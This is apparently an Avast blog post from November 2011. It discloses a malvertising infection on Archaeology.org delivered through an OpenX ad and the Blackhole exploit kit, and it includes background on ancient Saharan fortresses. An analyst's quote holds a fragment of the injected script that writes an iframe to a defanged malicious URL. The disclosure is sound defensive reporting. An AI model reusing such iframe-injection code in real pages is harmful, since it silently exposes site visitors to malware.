Discover lost fortresses and modern malware
History fans can do more than just learn about a vanished empire in the Sahara. When they visit Archaeology.org, the online publication of the Archaeological Institute of America, they can also pick up malware via an infected advertisement on the page.
“It's a blackhole attack through advertisements, OpenX in this case,” confirmed Jiri Sejtko, senior virus analyst at the AVAST Virus Lab. “Here it is: OA_output['16'] += "<"+.... document.write(\'<"+"iframe src=\"hxxp://hdfh11.coom.in/main.php?page=423b262d0a1a9f70\"
OpenX is an open-source platform for exchanging advertisements. The blackhole toolkit is, in a nutshell, a system for delivering a wide range of malware. “It could be almost anything, for example a worm or fake antivirus,” added Jiri.
This latest bit of malware was uncovered by computer users researching the hotlinks on a recent National Geographic article http://news.nationalgeographic.com/news/2011/11/111111-sahara-libya-lost-civilization-science-satellites/ and the Discover magazine article Satellite Photos Show Ancient Saharan Fortresses of a Lost Empire.
The intrepid online researchers worked their way backwards to an article from 2004 entitled “Kingdom of the Sands” at http://www.archaeology.org/0403/abstracts/sands.html and this is where the infection popped up. “The link for ‘complicated water-extraction system’ leads to a page with MalWare. or so my Avast antivirus says,” commented Hugo, a participant on the Discovery blog.
Well yes, Jiri confirmed that something bad is indeed there (as of 11:00 CET, November 21, 2011). Hugo should be happy that avast! shut out the offending malware. Also, because infection is in an advertisement, it is not limited to the one article from 2004.
BTW, the articles are about a series of fortresses from the Garamantes people in Southern Libya about 2000 years ago. The key to the Garamantes’ power was a series of tunnels for tapping underground water – a theme that makes for fascinating reading and for quickly clicking back through a series of links.
Here is my screenshot of the page and my avast! detection. Yes, I do have the Pirate English version of avast!.
NOTE: As of 12:00 CET, November 22, Archaeology.org had removed the problematic advertisements. History buffs can now go back. However, for safer surfing anywhere on the net, try the SafeZone.
Highly effective Cerber ransomware is spread via phishing emails and demands more than $700 in ransom
Based on analysis of past Locky ransomware attacks, experts in the Avast Threat Labs predict that another attack is imminent.